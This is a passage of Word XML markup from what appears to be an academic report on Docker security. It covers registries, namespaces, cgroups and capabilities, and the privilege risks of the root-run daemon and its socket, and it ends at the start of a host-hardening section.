    <w:p w14:paraId="11E302CB" w14:textId="3971A9CD" w:rsidR="00955EA7" w:rsidRDefault="008557B4" w:rsidP="008557B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc87032895"/>
      <w:r>
        <w:t>Registries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="588BF4EA" w14:textId="2A78471E" w:rsidR="008557B4" w:rsidRDefault="008578FE" w:rsidP="008557B4">
      <w:r>
        <w:t>Docker registry is a service responsible for hosting and distributing images. It is an online store of Docker images.</w:t>
      </w:r>
      <w:r w:rsidR="00A441CD">
        <w:t xml:space="preserve"> Users and developers can use the CLI to pull</w:t>
      </w:r>
      <w:r w:rsidR="005034A9">
        <w:t xml:space="preserve"> and run images locally</w:t>
      </w:r>
      <w:r w:rsidR="0042404A">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00A441CD">
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidR="005034A9">
        <w:t xml:space="preserve"> images</w:t>
      </w:r>
      <w:r w:rsidR="00A441CD">
        <w:t xml:space="preserve"> to the registry.</w:t>
      </w:r>
      <w:r w:rsidR="0042404A">
        <w:t xml:space="preserve"> The registries can be private or publicly accessible, but the Docker engine uses the Docker hub as its public registry by default.</w:t>
      </w:r>
      <w:r w:rsidR="009B5E3F">
        <w:t xml:space="preserve"> However, users can also interact privately using </w:t>
      </w:r>
      <w:r w:rsidR="00D65196">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009B5E3F">
        <w:t>trusted registry to maintain and secure their images.</w:t>
      </w:r>
      <w:r w:rsidR="00E76132">
        <w:t xml:space="preserve"> Docker uses </w:t>
      </w:r>
      <w:r w:rsidR="00D65196">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E76132">
        <w:t>tag to identify multiple versions of the same image</w:t>
      </w:r>
      <w:r w:rsidR="00D65196">
        <w:t>, and in case a user does not specify the tag, Docker picks the latest version automatically.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5B6F">
        <w:t xml:space="preserve"> The tag feature allows users to select the right version of a particular image from the Docker Hub. For example, </w:t>
      </w:r>
      <w:r w:rsidR="004F602D">
        <w:t xml:space="preserve">a user can use a tag to differentiate multiple versions of Nginx server. Usually, </w:t>
      </w:r>
      <w:r w:rsidR="00364F04">
        <w:t>users can pull or push images using API calls</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1752387840"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00364F04">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00364F04">
            <w:instrText xml:space="preserve"> CITATION ABA17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00010263">
            <w:instrText xml:space="preserve"> \m NMo21</w:instrText>
          </w:r>
          <w:r w:rsidR="00364F04">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[33, 34]</w:t>
          </w:r>
          <w:r w:rsidR="00364F04">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00364F04">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88FD7D" w14:textId="433F11EC" w:rsidR="00AF1C64" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc87032896"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DOCKER AND KERNEL SECURITY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="0B8EC521" w14:textId="5A51DCA6" w:rsidR="00287B1D" w:rsidRDefault="002F56D0" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">According in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-113910603"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BB518F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BB518F">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BB518F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="00BB518F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00BB518F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008D005D">
        <w:t xml:space="preserve">Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00921113">
        <w:t xml:space="preserve">relies on several key factors, mainly </w:t>
      </w:r>
      <w:r w:rsidR="006155FB">
        <w:t xml:space="preserve">isolation, </w:t>
      </w:r>
      <w:r w:rsidR="00554383">
        <w:t xml:space="preserve">Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00EA529E">
        <w:t xml:space="preserve">attack surface, misconfiguration in the containers, and </w:t>
      </w:r>
      <w:r w:rsidR="000048B0">
        <w:t>hardening network operations security.</w:t>
      </w:r>
      <w:r w:rsidR="003B38E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB686E">
        <w:t>As mentioned above, Docker containers are created based upon Linux</w:t>
      </w:r>
      <w:r w:rsidR="00855153">
        <w:t xml:space="preserve"> kernel</w:t>
      </w:r>
      <w:r w:rsidR="00CB686E">
        <w:t xml:space="preserve"> features and capabilities and thus share similar security characteristics.</w:t>
      </w:r>
      <w:r w:rsidR="006A4F80">
        <w:t xml:space="preserve"> Therefore, it is essential to explore and understand the security features of Linux </w:t>
      </w:r>
      <w:r w:rsidR="00855153">
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidR="00757688">
        <w:t xml:space="preserve">. The existence of Docker is </w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t xml:space="preserve">heavily reliant on </w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t xml:space="preserve"> Linux properties, </w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t>especially</w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t xml:space="preserve"> namespace</w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t>control groups (Cgroups)</w:t>
      </w:r>
      <w:r w:rsidR="00D9197A">
        <w:t>, and capabilities</w:t>
      </w:r>
      <w:r w:rsidR="001A264F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0017104E">
        <w:t xml:space="preserve"> The namespaces isolate </w:t>
      </w:r>
      <w:r w:rsidR="00751260">
        <w:t xml:space="preserve">each Docker container from the host machine and other containers using various </w:t>
      </w:r>
      <w:r w:rsidR="00BD5A6B">
        <w:t>LXC features</w:t>
      </w:r>
      <w:r w:rsidR="00250E7C">
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidR="00250E7C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00250E7C">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00250E7C">
        <w:t>, net, and others.</w:t>
      </w:r>
      <w:r w:rsidR="00BD5A6B">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidR="00BD5A6B">
        <w:t xml:space="preserve"> and net namespaces are the key LXC tools </w:t>
      </w:r>
      <w:r w:rsidR="00C87B33">
        <w:t xml:space="preserve">to provide isolation for each </w:t>
      </w:r>
      <w:r w:rsidR="00224BBA">
        <w:t>process, enabling each container to run using the processes ID in hierarchical order.</w:t>
      </w:r>
      <w:r w:rsidR="001A6904">
        <w:t xml:space="preserve"> This allows multiple containers </w:t>
      </w:r>
      <w:r w:rsidR="00287B1D">
        <w:t xml:space="preserve">to run </w:t>
      </w:r>
      <w:r w:rsidR="001A6904">
        <w:t xml:space="preserve">completely separated </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve">from each other </w:t>
      </w:r>
      <w:r w:rsidR="001A6904">
        <w:t>using namespaces on a single host.</w:t>
      </w:r>
      <w:r w:rsidR="002A08F7">
        <w:t xml:space="preserve"> Namespaces also </w:t>
      </w:r>
      <w:r w:rsidR="004E4ADF">
        <w:t xml:space="preserve">enables </w:t>
      </w:r>
      <w:r w:rsidR="003C483C">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="00EC213E">
        <w:t xml:space="preserve">to communicate over a network by </w:t>
      </w:r>
      <w:r w:rsidR="00B951E0">
        <w:t>allocating</w:t>
      </w:r>
      <w:r w:rsidR="00EC213E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006273E4">
        <w:t>each container a unique IP address and hostname</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1566716286"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00CC193C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CC193C">
            <w:instrText xml:space="preserve"> CITATION AMJ15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CA2A12">
            <w:instrText xml:space="preserve"> \m EBa15</w:instrText>
          </w:r>
          <w:r w:rsidR="00CC193C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[36, 37]</w:t>
          </w:r>
          <w:r w:rsidR="00CC193C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006E2926">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDB55D" w14:textId="72F13F91" w:rsidR="00E2718C" w:rsidRDefault="00B07177" w:rsidP="00CB686E">
      <w:r>
        <w:t>On the other hand, Docker uses Cgroups to manage and allocate resources for each container.</w:t>
      </w:r>
      <w:r w:rsidR="006235BE">
        <w:t xml:space="preserve"> It helps limit and assign resources, such as memory, CPU, and disk I/O</w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006235BE">
        <w:t xml:space="preserve"> to each container</w:t>
      </w:r>
      <w:r w:rsidR="002A2AE3">
        <w:t xml:space="preserve"> by preventing a single container from exhausting all resources </w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="002A2AE3">
        <w:t xml:space="preserve">ensuring each container </w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>gets its allocated resources.</w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve"> For this reason, Cgroups </w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve">are crucial to prevent denial of service (Dos) attacks on containers. </w:t>
      </w:r>
      <w:r w:rsidR="00055873">
        <w:t>They are</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> also </w:t>
      </w:r>
      <w:r w:rsidR="00055873">
        <w:t>helpful</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> to monitor the performance and resilienc</w:t>
      </w:r>
      <w:r w:rsidR="00F461DB">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> of applications on a cloud platform, especially on</w:t>
      </w:r>
      <w:r w:rsidR="00055873">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="004A08CC">
        <w:t xml:space="preserve"> multi-tenant cloud environment.</w:t>
      </w:r>
      <w:r w:rsidR="005059B5">
        <w:t xml:space="preserve"> Simply put, </w:t>
      </w:r>
      <w:r w:rsidR="007E14DF">
        <w:t xml:space="preserve">Cgroups </w:t>
      </w:r>
      <w:r w:rsidR="00EA15E5">
        <w:t xml:space="preserve">protects containers </w:t>
      </w:r>
      <w:r w:rsidR="005F6CF8">
        <w:t>from being exploited by limiting resource sharing</w:t>
      </w:r>
      <w:r w:rsidR="00DA1D57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00351977">
        <w:t>among</w:t>
      </w:r>
      <w:r w:rsidR="00DA1D57">
        <w:t xml:space="preserve"> them</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="607698394"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D8022A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D8022A">
            <w:instrText xml:space="preserve"> CITATION RRo14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E008D">
            <w:instrText xml:space="preserve"> \m KOh19</w:instrText>
          </w:r>
          <w:r w:rsidR="00D8022A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[38, 39]</w:t>
          </w:r>
          <w:r w:rsidR="00D8022A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00DA1D57">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EA15E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507C49A" w14:textId="4D401A1A" w:rsidR="008142A4" w:rsidRDefault="00C072BE" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00E2718C">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uses </w:t>
      </w:r>
      <w:r w:rsidR="00D756C9">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E52DB4">
        <w:t xml:space="preserve">Linux kernel capabilities feature </w:t>
      </w:r>
      <w:r w:rsidR="00E2718C">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00F96212">
        <w:t xml:space="preserve">limit </w:t>
      </w:r>
      <w:r w:rsidR="00C5690C">
        <w:t>the privilege of a process</w:t>
      </w:r>
      <w:r w:rsidR="00DA174A">
        <w:t xml:space="preserve"> to a minimum level when needed.</w:t>
      </w:r>
      <w:r w:rsidR="003A2901">
        <w:t xml:space="preserve"> By default, </w:t>
      </w:r>
      <w:r w:rsidR="00BA0E5F">
        <w:t>containers are designed to sta</w:t>
      </w:r>
      <w:r w:rsidR="00DA301C">
        <w:t xml:space="preserve">rt with a </w:t>
      </w:r>
      <w:r w:rsidR="0023614A">
        <w:t xml:space="preserve">confined </w:t>
      </w:r>
      <w:r w:rsidR="00F43BF0">
        <w:t xml:space="preserve">set of </w:t>
      </w:r>
      <w:r w:rsidR="00080362">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00B07CF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080362">
        <w:t>capabilit</w:t>
      </w:r>
      <w:r w:rsidR="00F43BF0">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="00BF5D7D">
        <w:t xml:space="preserve">. However, it also allows flexibility </w:t>
      </w:r>
      <w:r w:rsidR="00A95FA3">
        <w:t xml:space="preserve">for specific services </w:t>
      </w:r>
      <w:r w:rsidR="00CA3D86">
        <w:t>to start with root privilege when needed.</w:t>
      </w:r>
      <w:r w:rsidR="000D58E4">
        <w:t xml:space="preserve"> Usually, capabilities </w:t>
      </w:r>
      <w:r w:rsidR="00A04674">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00F83914">
        <w:t xml:space="preserve"> used to provide </w:t>
      </w:r>
      <w:r w:rsidR="006F56C7">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00431694">
        <w:t xml:space="preserve"> between non-root and root users.</w:t>
      </w:r>
      <w:r w:rsidR="00C70868">
        <w:t xml:space="preserve"> As a result, it can protect against privilege </w:t>
      </w:r>
      <w:r w:rsidR="00E50258">
        <w:t xml:space="preserve">and container break out attacks within </w:t>
      </w:r>
      <w:r w:rsidR="00EB2EB4">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E50258">
        <w:t>Docker environment</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2091496474"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B8795D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B8795D">
            <w:instrText xml:space="preserve"> CITATION DHu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B8795D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
          <w:r w:rsidR="00B8795D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E50258">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD315D5" w14:textId="5B5F343C" w:rsidR="00EA3BE6" w:rsidRDefault="001713B5" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">Further, </w:t>
      </w:r>
      <w:r w:rsidR="00684346">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AF555C">
        <w:t>Docker daemon</w:t>
      </w:r>
      <w:r w:rsidR="006562A4">
        <w:t xml:space="preserve"> service</w:t>
      </w:r>
      <w:r w:rsidR="00AF555C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562A4">
        <w:t>runs on the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00912F92">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="006562A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00255028">
        <w:t xml:space="preserve">needs </w:t>
      </w:r>
      <w:r w:rsidR="009F348D">
        <w:t>root access</w:t>
      </w:r>
      <w:r w:rsidR="00D36777">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006A56C6">
        <w:t xml:space="preserve"> Th</w:t>
      </w:r>
      <w:r w:rsidR="00F1632C">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="006A56C6">
        <w:t xml:space="preserve"> feature </w:t>
      </w:r>
      <w:r w:rsidR="00A909AB">
        <w:t>could</w:t>
      </w:r>
      <w:r w:rsidR="006A56C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC1BE9">
        <w:t xml:space="preserve">create </w:t>
      </w:r>
      <w:r w:rsidR="00F1632C">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00213B36">
        <w:t>loopholes if it</w:t>
      </w:r>
      <w:r w:rsidR="00361A41">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00213B36">
        <w:t xml:space="preserve"> used </w:t>
      </w:r>
      <w:r w:rsidR="00E77A78">
        <w:t>without careful consideration</w:t>
      </w:r>
      <w:r w:rsidR="001E523F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00942914">
        <w:t>implications.</w:t>
      </w:r>
      <w:r w:rsidR="003007B9">
        <w:t xml:space="preserve"> For instance, Docker allows users to create </w:t>
      </w:r>
      <w:r w:rsidR="00C83DE7">
        <w:t xml:space="preserve">a shared volume between the host and </w:t>
      </w:r>
      <w:r w:rsidR="00516B30">
        <w:t xml:space="preserve">a container with </w:t>
      </w:r>
      <w:r w:rsidR="00086719">
        <w:t>full access and privilege.</w:t>
      </w:r>
      <w:r w:rsidR="00E97073">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00585201">
        <w:t xml:space="preserve">a user can start a container from the host </w:t>
      </w:r>
      <w:r w:rsidR="00585201">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">directory </w:t>
      </w:r>
      <w:r w:rsidR="0037098C">
        <w:t xml:space="preserve">without any </w:t>
      </w:r>
      <w:r w:rsidR="00EC3ADC">
        <w:t>limitations.</w:t>
      </w:r>
      <w:r w:rsidR="00533255">
        <w:t xml:space="preserve"> Docker uses </w:t>
      </w:r>
      <w:r w:rsidR="00CE72A6">
        <w:t>a UNIX socket</w:t>
      </w:r>
      <w:r w:rsidR="00B66142">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E66CE4">
        <w:t>/var/run/docker</w:t>
      </w:r>
      <w:r w:rsidR="00B766CB">
        <w:t>.sock to</w:t>
      </w:r>
      <w:r w:rsidR="00074819">
        <w:t xml:space="preserve"> listen and </w:t>
      </w:r>
      <w:r w:rsidR="003F2FFB">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="00074819">
        <w:t xml:space="preserve">entry point </w:t>
      </w:r>
      <w:r w:rsidR="009763D1">
        <w:t xml:space="preserve">for API calls </w:t>
      </w:r>
      <w:r w:rsidR="00DF6B8E">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="005B6383">
        <w:t>root access</w:t>
      </w:r>
      <w:r w:rsidR="00BF1813">
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF1813">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t>his implies</w:t>
      </w:r>
      <w:r w:rsidR="00BF1813">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t>malicious user</w:t>
      </w:r>
      <w:r w:rsidR="00602BEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00664CD3">
        <w:t xml:space="preserve"> bypass </w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve">through the </w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t>REST API</w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve"> to escalate </w:t>
      </w:r>
      <w:r w:rsidR="005F0117">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t>conduct</w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF00CF">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t>privilege</w:t>
      </w:r>
      <w:r w:rsidR="00EF00CF">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00DE6786">
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="00564307">
        <w:t xml:space="preserve"> within </w:t>
      </w:r>
      <w:r w:rsidR="00E8223E">
        <w:t>the Docker system</w:t>
      </w:r>
      <w:r w:rsidR="00780DE5">
        <w:t xml:space="preserve"> because of </w:t>
      </w:r>
      <w:r w:rsidR="00300087">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00780DE5">
        <w:t xml:space="preserve"> root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00E8223E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C56CFE">
        <w:t xml:space="preserve"> However, Docker recommends </w:t>
      </w:r>
      <w:r w:rsidR="00B733C1">
        <w:t xml:space="preserve">not to </w:t>
      </w:r>
      <w:r w:rsidR="009268A3">
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="00B64394">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00B733C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64394">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00D13E49">
        <w:t xml:space="preserve"> Docker daemon socket </w:t>
      </w:r>
      <w:r w:rsidR="009268A3">
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidR="005F7D3D">
        <w:t>loopback address (127.0.0.1)</w:t>
      </w:r>
      <w:r w:rsidR="00D90240">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0023499B">
        <w:t xml:space="preserve"> It is also a good practice </w:t>
      </w:r>
      <w:r w:rsidR="00F078A6">
        <w:t>to restrict access to the daemon socket</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2124528045"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009077B9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009077B9">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="003E4446">
            <w:instrText xml:space="preserve"> \m AMa18</w:instrText>
          </w:r>
          <w:r w:rsidR="009077B9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35, 41]</w:t>
          </w:r>
          <w:r w:rsidR="009077B9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F078A6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED98B06" w14:textId="5808AE45" w:rsidR="004A6DE6" w:rsidRDefault="005B3F20" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">The security of Docker </w:t>
      </w:r>
      <w:r w:rsidR="00802BFB">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00107354">
        <w:t xml:space="preserve">includes </w:t>
      </w:r>
      <w:r w:rsidR="00E5762C">
        <w:t>assessing the various Docker components</w:t>
      </w:r>
      <w:r w:rsidR="00EF7171">
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidR="006004C2">
        <w:t>host security, network, and others.</w:t>
      </w:r>
      <w:r w:rsidR="00D55ABE">
        <w:t xml:space="preserve"> The lists below </w:t>
      </w:r>
      <w:r w:rsidR="00987444">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00DB5CA0">
        <w:t xml:space="preserve">xplain the security measures </w:t>
      </w:r>
      <w:r w:rsidR="00B44183">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00DB5CA0">
        <w:t>Docker components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC96364" w14:textId="77777777" w:rsidR="00F22E47" w:rsidRDefault="00222FEA" w:rsidP="00E30A2D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc87032897"/>
      <w:r w:rsidRPr="00F22E47">
        <w:t xml:space="preserve">Host </w:t>
      </w:r>
      <w:r w:rsidR="00C14462" w:rsidRPr="00F22E47">
        <w:t>Hardening</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="6960728C" w14:textId="4D89BC8C" w:rsidR="007A51FA" w:rsidRDefault="00E009DF" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">The host kernel is shared among </w:t>
      </w:r>
      <w:r w:rsidR="002A2835">
        <w:t>multiple containers</w:t>
      </w:r>
